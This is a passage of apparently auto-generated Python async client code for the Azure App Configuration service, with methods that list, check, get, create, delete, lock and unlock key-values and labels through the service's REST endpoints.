header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_keys.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_keys.metadata = {'url': '/keys'} # type: ignore
async def check_keys(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param name: A filter for the name of the returned keys.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_keys.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_keys.metadata = {'url': '/keys'} # type: ignore
def get_key_values(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Get6ItemsItem"]]] = None,
**kwargs
) -> AsyncIterable["_models.KeyValueListResult"]:
"""Gets a list of key-values.
Gets a list of key-values.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Get6ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either KeyValueListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.KeyValueListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValueListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kvset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_key_values.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('KeyValueListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_key_values.metadata = {'url': '/kv'} # type: ignore
async def check_key_values(
self,
key: Optional[str] = None,
label: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[Union[str, "_models.Head6ItemsItem"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: A filter used to match keys.
:type key: str
:param label: A filter used to match labels.
:type label: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Head6ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_key_values.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if key is not None:
query_parameters['key'] = self._serialize.query("key", key, 'str')
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_key_values.metadata = {'url': '/kv'} # type: ignore
async def get_key_value(
self,
key: str,
label: Optional[str] = None,
accept_datetime: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
select: Optional[List[Union[str, "_models.Get7ItemsItem"]]] = None,
**kwargs
) -> "_models.KeyValue":
"""Gets a single key-value.
Gets a single key-value.
:param key: The key of the key-value to retrieve.
:type key: str
:param label: The label of the key-value to retrieve.
:type label: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Get7ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.get_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('str', response.headers.get('Last-Modified'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
get_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
async def put_key_value(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
entity: Optional["_models.KeyValue"] = None,
**kwargs
) -> "_models.KeyValue":
"""Creates a key-value.
Creates a key-value.
:param key: The key of the key-value to create.
:type key: str
:param label: The label of the key-value to create.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param entity: The key-value to create.
:type entity: ~azure.appconfiguration.models.KeyValue
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
content_type = kwargs.pop("content_type", "application/vnd.microsoft.appconfig.kv+json")
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.put_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if entity is not None:
body_content = self._serialize.body(entity, 'KeyValue')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
async def delete_key_value(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
**kwargs
) -> Optional["_models.KeyValue"]:
"""Deletes a key-value.
Deletes a key-value.
:param key: The key of the key-value to delete.
:type key: str
:param label: The label of the key-value to delete.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue or None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.KeyValue"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.delete_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
deserialized = None
if response.status_code == 200:
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if response.status_code == 204:
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
delete_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
async def check_key_value(
self,
key: str,
label: Optional[str] = None,
accept_datetime: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
select: Optional[List[Union[str, "_models.Head7ItemsItem"]]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param key: The key of the key-value to retrieve.
:type key: str
:param label: The label of the key-value to retrieve.
:type label: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str or ~azure.appconfiguration.models.Head7ItemsItem]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_key_value.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
response_headers['Last-Modified']=self._deserialize('str', response.headers.get('Last-Modified'))
if cls:
return cls(pipeline_response, None, response_headers)
check_key_value.metadata = {'url': '/kv/{key}'} # type: ignore
def get_labels(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[str]] = None,
**kwargs
) -> AsyncIterable["_models.LabelListResult"]:
"""Gets a list of labels.
Gets a list of labels.
:param name: A filter for the name of the returned labels.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LabelListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.appconfiguration.models.LabelListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LabelListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.labelset+json, application/json, application/problem+json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_labels.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('LabelListResult', pipeline_response)
list_of_elem = deserialized.items
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.Error, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_labels.metadata = {'url': '/labels'} # type: ignore
async def check_labels(
self,
name: Optional[str] = None,
after: Optional[str] = None,
accept_datetime: Optional[str] = None,
select: Optional[List[str]] = None,
**kwargs
) -> None:
"""Requests the headers and status of the given resource.
Requests the headers and status of the given resource.
:param name: A filter for the name of the returned labels.
:type name: str
:param after: Instructs the server to return elements that appear after the element referred to
by the specified token.
:type after: str
:param accept_datetime: Requests the server to respond with the state of the resource at the
specified time.
:type accept_datetime: str
:param select: Used to select what fields are present in the returned resource(s).
:type select: list[str]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
# Construct URL
url = self.check_labels.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if after is not None:
query_parameters['After'] = self._serialize.query("after", after, 'str')
if select is not None:
query_parameters['$Select'] = self._serialize.query("select", select, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if accept_datetime is not None:
header_parameters['Accept-Datetime'] = self._serialize.header("accept_datetime", accept_datetime, 'str')
request = self._client.head(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
if cls:
return cls(pipeline_response, None, response_headers)
check_labels.metadata = {'url': '/labels'} # type: ignore
async def put_lock(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
**kwargs
) -> "_models.KeyValue":
"""Locks a key-value.
Locks a key-value.
:param key: The key of the key-value to lock.
:type key: str
:param label: The label, if any, of the key-value to lock.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.put_lock.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.put(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error)
response_headers = {}
response_headers['Sync-Token']=self._deserialize('str', response.headers.get('Sync-Token'))
response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
deserialized = self._deserialize('KeyValue', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put_lock.metadata = {'url': '/locks/{key}'} # type: ignore
async def delete_lock(
self,
key: str,
label: Optional[str] = None,
if_match: Optional[str] = None,
if_none_match: Optional[str] = None,
**kwargs
) -> "_models.KeyValue":
"""Unlocks a key-value.
Unlocks a key-value.
:param key: The key of the key-value to unlock.
:type key: str
:param label: The label, if any, of the key-value to unlock.
:type label: str
:param if_match: Used to perform an operation only if the targeted resource's etag matches the
value provided.
:type if_match: str
:param if_none_match: Used to perform an operation only if the targeted resource's etag does
not match the value provided.
:type if_none_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: KeyValue, or the result of cls(response)
:rtype: ~azure.appconfiguration.models.KeyValue
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.KeyValue"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "1.0"
accept = "application/vnd.microsoft.appconfig.kv+json, application/json, application/problem+json"
# Construct URL
url = self.delete_lock.metadata['url'] # type: ignore
path_format_arguments = {
'endpoint': self._serialize.url("self._config.endpoint", self._config.endpoint, 'str', skip_quote=True),
'key': self._serialize.url("key", key, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if label is not None:
query_parameters['label'] = self._serialize.query("label", label, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if self._config.sync_token is not None:
header_parameters['Sync-Token'] = self._serialize.header("self._config.sync_token", self._config.sync_token, 'str')
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
if if_none_match is not None:
header_parameters['If-None-Match'] = self._serialize.header("if_none_match", if_none_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
